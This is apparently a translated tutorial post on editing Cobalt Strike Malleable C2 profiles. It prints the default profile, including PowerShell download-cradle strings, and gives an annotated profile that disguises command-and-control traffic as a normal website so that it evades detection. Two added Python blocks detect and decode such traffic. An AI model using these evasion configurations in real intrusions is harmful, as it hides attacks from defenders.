
Customizing the CS profile configuration file

default.profile is the configuration file that ships with Cobalt Strike.

This file lets you customize many things, such as the web request URIs and the default sleep time. This post picks a few of them to walk through.

0x01 CS communication mechanism

There are already many detailed explanations online, so I will only give a brief one.

Anyone who has used CS knows about sleep: if you issue a command, the result only comes back after the sleep interval ends.

When no command has been issued, the client sends a GET request to the server. The request carries the client's basic information; where exactly it is placed depends on the profile configuration.

After a command is issued, the client also sends a GET request to tell the server it is going to execute a command. The server hands down an id and the specific task, and after executing it the client POSTs the result back.

Traffic encryption and decryption is not covered here; I will write about it in a later post.

0x02 Default configuration

First, look at the profile that ships with CS.

# default sleep time is 60s
set sleeptime "60000"; //default sleep time of sixty seconds

# jitter factor 0-99% [randomize callback times]
set jitter "0"; //randomized timing

# indicate that this is the default Beacon profile
set sample_name "Cobalt Strike Beacon (Default)"; //just a name

# this is the default profile. Make sure we look like Cobalt Strike's Beacon payload. (that's what we are, right?)
stage { //beacon.dll is generated according to this block
set stomppe "false"; //turn off the light obfuscation
set name "beacon.dll"; //the file name to set

string "%d.%s"; //strings added to the file
string "post";
string "%s%s";
string "cdn.%x%x.%s";
string "www6.%x%x.%s";
string "%s.1%x.%x%x.%s";
string "%s.4%08x%08x%08x%08x%08x.%08x%08x%08x%08x%08x%08x%08x.%08x%08x%08x%08x%08x%08x%08x.%08x%08x%08x%08x%08x%08x%08x.%x%x.%s";
string "%s.3%08x%08x%08x%08x%08x%08x%08x.%08x%08x%08x%08x%08x%08x%08x.%08x%08x%08x%08x%08x%08x%08x.%x%x.%s";
string "%s.2%08x%08x%08x%08x%08x%08x%08x.%08x%08x%08x%08x%08x%08x%08x.%x%x.%s";
string "%s.2%08x%08x%08x%08x%08x%08x.%08x%08x%08x%08x%08x%08x.%x%x.%s";
string "%s.2%08x%08x%08x%08x%08x.%08x%08x%08x%08x%08x.%x%x.%s";
string "%s.1%08x%08x%08x%08x%08x%08x%08x.%x%x.%s";
string "%s.1%08x%08x%08x%08x%08x%08x.%x%x.%s";
string "%s.1%08x%08x%08x%08x%08x.%x%x.%s";
string "%s.1%08x%08x%08x%08x.%x%x.%s";
string "%s.1%08x%08x%08x.%x%x.%s";
string "%s.1%08x%08x.%x%x.%s";
string "%s.1%08x.%x%x.%s";
string "api.%x%x.%s";
string "unknown";
string "could not run command (w/ token) because of its length of %d bytes!";
string "could not spawn %s (token): %d";
string "could not spawn %s: %d";
string "Could not open process token: %d (%u)";
string "could not run %s as %s\\%s: %d";
string "COMSPEC";
string " /C ";
string "could not upload file: %d";
string "could not open %s: %d";
string "could not get file time: %d";
string "could not set file time: %d";
string "127.0.0.1";
string "Could not connect to pipe (%s): %d";
string "Could not open service control manager on %s: %d";
string "Could not create service %s on %s: %d";
string "Could not start service %s on %s: %d";
string "Started service %s on %s";
string "Could not query service %s on %s: %d";
string "Could not delete service %s on %s: %d";
string "SeDebugPrivilege";
string "SeTcbPrivilege";
string "SeCreateTokenPrivilege";
string "SeAssignPrimaryTokenPrivilege";
string "SeLockMemoryPrivilege";
string "SeIncreaseQuotaPrivilege";
string "SeUnsolicitedInputPrivilege";
string "SeMachineAccountPrivilege";
string "SeSecurityPrivilege";
string "SeTakeOwnershipPrivilege";
string "SeLoadDriverPrivilege";
string "SeSystemProfilePrivilege";
string "SeSystemtimePrivilege";
string "SeProfileSingleProcessPrivilege";
string "SeIncreaseBasePriorityPrivilege";
string "SeCreatePagefilePrivilege";
string "SeCreatePermanentPrivilege";
string "SeBackupPrivilege";
string "SeRestorePrivilege";
string "SeShutdownPrivilege";
string "SeAuditPrivilege";
string "SeSystemEnvironmentPrivilege";
string "SeChangeNotifyPrivilege";
string "SeRemoteShutdownPrivilege";
string "SeUndockPrivilege";
string "SeSyncAgentPrivilege";
string "SeEnableDelegationPrivilege";
string "SeManageVolumePrivilege";
string "Could not create service: %d";
string "Could not start service: %d";
string "Failed to impersonate token: %d";
string "Failed to get token";
string "IsWow64Process";
string "kernel32";
string "Could not open '%s'";
string "%s\\%s";
string "copy failed: %d";
string "move failed: %d";
string "D 0 %02d/%02d/%02d %02d:%02d:%02d %s";
string "F %I64d %02d/%02d/%02d %02d:%02d:%02d %s";
string "Wow64DisableWow64FsRedirection";
string "Wow64RevertWow64FsRedirection";
string "ppid %d is in a different desktop session (spawned jobs may fail). Use 'ppid' to reset.";
string "could not allocate %d bytes in process: %d";
string "could not write to process memory: %d";
string "could not adjust permissions in process: %d";
string "could not create remote thread in %d: %d";
string "could not open process %d: %d";
string "%d is an x64 process (can't inject x86 content)";
string "%d is an x86 process (can't inject x64 content)";
string "syswow64";
string "system32";
string "Could not set PPID to %d: %d";
string "Could not set PPID to %d";
string "ntdll";
string "NtQueueApcThread";
string "%ld ";
string "%.2X";
string "%.2X:";
string "process";
string "Could not connect to pipe: %d";
string "%d %d %s";
string "Kerberos";
string "kerberos ticket purge failed: %08x";
string "kerberos ticket use failed: %08x";
string "could not connect to pipe: %d";
string "could not connect to pipe";
string "Maximum links reached. Disconnect one";
string "%d %d %d.%d %s %s %s %d %d";
string "Could not bind to %d";
string "IEX (New-Object Net.Webclient).DownloadString('http://127.0.0.1:%u/')";
string "%%IMPORT%%";
string "Command length (%d) too long";
string "IEX (New-Object Net.Webclient).DownloadString('http://127.0.0.1:%u/'); %s";
string "powershell -nop -exec bypass -EncodedCommand \"%s\"";
string "?%s=%s";
string "%s&%s=%s";
string "%s%s: %s";
string "%s&%s";
string "%s%s";
string "Could not kill %d: %d";
string "%s %d %d";
string "%s %d %d %s %s %d";
string "%s\\*";
string "sha256";
string "abcdefghijklmnop";
string "sprng";
string "could not create pipe: %d";
string "I'm already in SMB mode";
string "%s (admin)";
string "Could not open process: %d (%u)";
string "Failed to impersonate token from %d (%u)";
string "Failed to duplicate primary token for %d (%u)";
string "Failed to impersonate logged on user %d (%u)";
string "Could not create token: %d";
string "HTTP/1.1 200 OK";
}

//this is the GET request; every path listed below will exist on the server
# define indicators for an HTTP GET
http-get {
# Beacon will randomly choose from this pool of URIs
set uri "/ca /dpixel /__utm.gif /pixel.gif /g.pixel /dot.gif /updates.rss /fwlink /cm /cx /pixel /match /visit.js /load /push /ptj /j.ad /ga.js /en_US/all.js /activity /IE9CompatViewList.xml";

//this is the format of the client's request to the server; the basic information mentioned earlier is base64-encoded and sent in it
client {
# base64 encode session metadata and store it in the Cookie header.
metadata {
base64;
header "Cookie";
}
}
//this is the server's response packet; the type is application/octet-stream, and if there is a task id and task to hand down it is output directly
server {
# server should send output with no changes
header "Content-Type" "application/octet-stream";

output {
print;
}
}
}

# define indicators for an HTTP POST
http-post {
# Same as above, Beacon will randomly choose from this pool of URIs [if multiple URIs are provided]
set uri "/submit.php"; //define the request path
//define the request headers
client {
header "Content-Type" "application/octet-stream";

# transmit our session identifier as /submit.php?id=[identifier]
//this is the task id
id {
parameter "id";
}

# post our output with no real changes
output { //print the result directly
print;
}
}

# The server's response to our HTTP POST
server {
header "Content-Type" "text/html"; //define the response type

# this will just print an empty string, meh...
output {
print; //print the result directly
}
}
}

//the dns-beacon configuration below is skipped for now, because I have not used a DNS Beacon yet
# define indicators/attributes for a DNS Beacon
dns-beacon {
# maximum number of bytes to send in a DNS A record request
set maxdns "255";

set beacon "";
set get_A "cdn.";
set get_AAAA "www6.";
set get_TXT "api.";
set put_metadata "www.";
set put_output "post.";
}

Platforms like ThreatBook (微步) can check whether a server is malicious, and this default configuration will basically always be caught: just scan whether the paths defined in http-get and http-post exist, and if they all do, it is a C2 server. To avoid being flagged, modify the configuration file.
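As an added detection example (not part of the original post), the Python below scans constructed proxy log lines for the default profile's indicators: GET requests to the default URI pool that carry a bare base64 Cookie, and POSTs to /submit.php?id=. The log format, hostnames and IP addresses are assumptions for the example.

```python
import re
from collections import defaultdict

# URI pool and POST path copied from the default.profile shown above.
DEFAULT_GET_URIS = {
    "/ca", "/dpixel", "/__utm.gif", "/pixel.gif", "/g.pixel", "/dot.gif",
    "/updates.rss", "/fwlink", "/cm", "/cx", "/pixel", "/match", "/visit.js",
    "/load", "/push", "/ptj", "/j.ad", "/ga.js", "/en_US/all.js", "/activity",
    "/IE9CompatViewList.xml",
}
DEFAULT_POST_URI = "/submit.php"

# Assumed (hypothetical) proxy log format: "<src-ip> <METHOD> <host> <path[?query]> <Cookie header or ->"
LOG_RE = re.compile(r"^(\S+) (GET|POST) (\S+) (\S+) (\S+)$")
# The default profile puts raw base64 metadata in Cookie with no "name=" prefix.
BARE_B64_RE = re.compile(r"^[A-Za-z0-9+/]{16,}={0,2}$")

def classify(line):
    """Return (src, host, kind, path) for one log line, or None if nothing matches."""
    m = LOG_RE.match(line)
    if not m:
        return None
    src, method, host, target, cookie = m.groups()
    path, _, query = target.partition("?")
    if method == "GET" and path in DEFAULT_GET_URIS and BARE_B64_RE.match(cookie):
        return (src, host, "get", path)
    if method == "POST" and path == DEFAULT_POST_URI and query.startswith("id="):
        return (src, host, "post", path)
    return None

def suspicious_pairs(lines, min_get_uris=2):
    """Group hits per (src, host) and flag pairs showing check-ins on several pool URIs
    plus at least one /submit.php?id= POST, which is how a default-profile Beacon behaves."""
    get_paths, posts = defaultdict(set), defaultdict(int)
    for hit in filter(None, map(classify, lines)):
        src, host, kind, path = hit
        if kind == "get":
            get_paths[(src, host)].add(path)
        else:
            posts[(src, host)] += 1
    return sorted(k for k in get_paths if len(get_paths[k]) >= min_get_uris and posts[k] > 0)

# Constructed sample log lines (not real traffic).
SAMPLE_LOG = [
    "10.0.0.5 GET cdn.example.test /dpixel -",
    "10.0.0.7 GET cdn.example.test /__utm.gif dGVzdC1tZXRhZGF0YS1ibG9i",
    "10.0.0.7 GET cdn.example.test /ga.js c2Vzc2lvbi1tZXRhZGF0YS0yMg==",
    "10.0.0.7 POST cdn.example.test /submit.php?id=12345 -",
    "10.0.0.9 GET www.example.test /index.html session=abc123",
]
```

Running suspicious_pairs(SAMPLE_LOG) flags only the 10.0.0.7 to cdn.example.test pair; the lone tracking-pixel GET without a cookie is left alone.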

0x03 Modifying the configuration

https://github.com/rsmudge/Malleable-C2-Profiles

This project has many example profiles.

Mainly because I recently looked into cloud functions, and using cloud functions requires modifying the profile, I will use the cloud-function profile as the example.

set sleeptime "10000"; //default sleep of ten seconds after check-in
set jitter "0"; //no jitter
set useragent "Mozilla/5.0 (Macintosh; Intel Mac OS X 10.15; rv:80.0) Gecko/20100101 Firefox/80.0"; //set the User-Agent header

http-get {

set uri "/index.html"; //define the path

client {
header "Accept" "*/*"; //define the request header
metadata {
base64; //data is base64-encoded
prepend "SESSIONID="; //the encoded data is placed after SESSIONID=
header "Cookie";
}
}

server {
header "Content-Type" "text/html; charset=utf-8"; //define the response headers
header "content-transfer-encoding" "binary";
header "Server" "nginx";
output {
base64; //the output is base64-encoded
append "index"; //a small detail: append must come after base64, otherwise it gets encoded along with the data
print; //output
}
}
}

//this defines where the payload is downloaded from; as mentioned earlier, CS's reverse shellcode downloads the main-function shellcode from the server, and if this is not defined a random four-character string is generated
http-stager {
set uri_x86 "/vue.min.js"; //location of the 32-bit shellcode
set uri_x64 "/bootstrap-2.min.js"; //location of the 64-bit shellcode
}

//the parts below that repeat what was already covered are not annotated again
http-post {
set uri "/wp-admin.php"; //post path
client {
header "Accept" "*/*";
//the id here is the task id; it is used when POSTing command output
id {
base64;
prepend "JSESSION=";
header "Cookie"; //written this way, the final packet contains Cookie: JSESSION=base64(id)
}
output {
base64; //the POST data is base64-encoded
print;
}
}
//likewise defines the server's response headers and data
server {
header "Content-Type" "application/ocsp-response";
header "content-transfer-encoding" "binary";
header "Connection" "keep-alive";
output {
base64;
print;
}
}
}
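An added Python example (not from the original post and not Cobalt Strike's own code) that models the ordered transform lists in the profile above, so an analyst who holds the profile can decode a captured Cookie value or response body; it also shows why append has to come after base64. The sample bytes are constructed.

```python
import base64

def apply_transforms(data: bytes, steps) -> bytes:
    """Apply a Malleable C2 style transform list in order, the way Beacon encodes a value."""
    for op, *args in steps:
        if op == "base64":
            data = base64.b64encode(data)
        elif op == "prepend":
            data = args[0].encode() + data
        elif op == "append":
            data = data + args[0].encode()
        else:
            raise ValueError(f"unsupported transform: {op}")
    return data

def invert_transforms(data: bytes, steps) -> bytes:
    """Undo the same list in reverse order, which is how an analyst with the profile
    recovers the raw value from a captured header or response body."""
    for op, *args in reversed(steps):
        if op == "base64":
            data = base64.b64decode(data, validate=True)
        elif op == "prepend":
            prefix = args[0].encode()
            if not data.startswith(prefix):
                raise ValueError("expected prefix missing")
            data = data[len(prefix):]
        elif op == "append":
            suffix = args[0].encode()
            if not data.endswith(suffix):
                raise ValueError("expected suffix missing")
            data = data[:-len(suffix)]
    return data

# Transform lists exactly as written in the cloud-function profile above.
GET_METADATA = [("base64",), ("prepend", "SESSIONID=")]   # http-get client metadata
POST_ID = [("base64",), ("prepend", "JSESSION=")]         # http-post client id
GET_OUTPUT = [("base64",), ("append", "index")]           # http-get server output
# The ordering mistake the profile comment warns about: append before base64.
GET_OUTPUT_WRONG = [("append", "index"), ("base64",)]

def demo():
    meta = b"constructed metadata"                       # constructed sample, not real Beacon metadata
    cookie = apply_transforms(meta, GET_METADATA)        # b"SESSIONID=..." as sent in the Cookie header
    ok = apply_transforms(b"task", GET_OUTPUT)           # ends with the literal b"index"
    wrong = apply_transforms(b"task", GET_OUTPUT_WRONG)  # "index" vanished into the base64 blob
    return (invert_transforms(cookie, GET_METADATA) == meta,
            ok.endswith(b"index"), b"index" in wrong)
```

demo() returns (True, True, False): the Cookie round-trips, the correct ordering leaves "index" visible on the wire, and the wrong ordering hides it.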

After these changes, even a web crawler that comes by will only see a normal website, perhaps one whose page just fails to display. CMS fingerprinting tools decide which CMS a site runs by scanning for specific files, so using wp-admin may get it identified as a WordPress site.

This file definitely cannot be used with the comments in it; a version without comments is provided later, which also saves you from having to delete them.

A finished profile can be checked with c2lint, which ships with CS, to test whether it is usable.

This is how the custom profile is used.

0x04 References

https://shanfenglan.blog.csdn.net/article/details/107791606

https://www.chabug.org/web/832.html

https://www.cobaltstrike.com/help-malleable-c2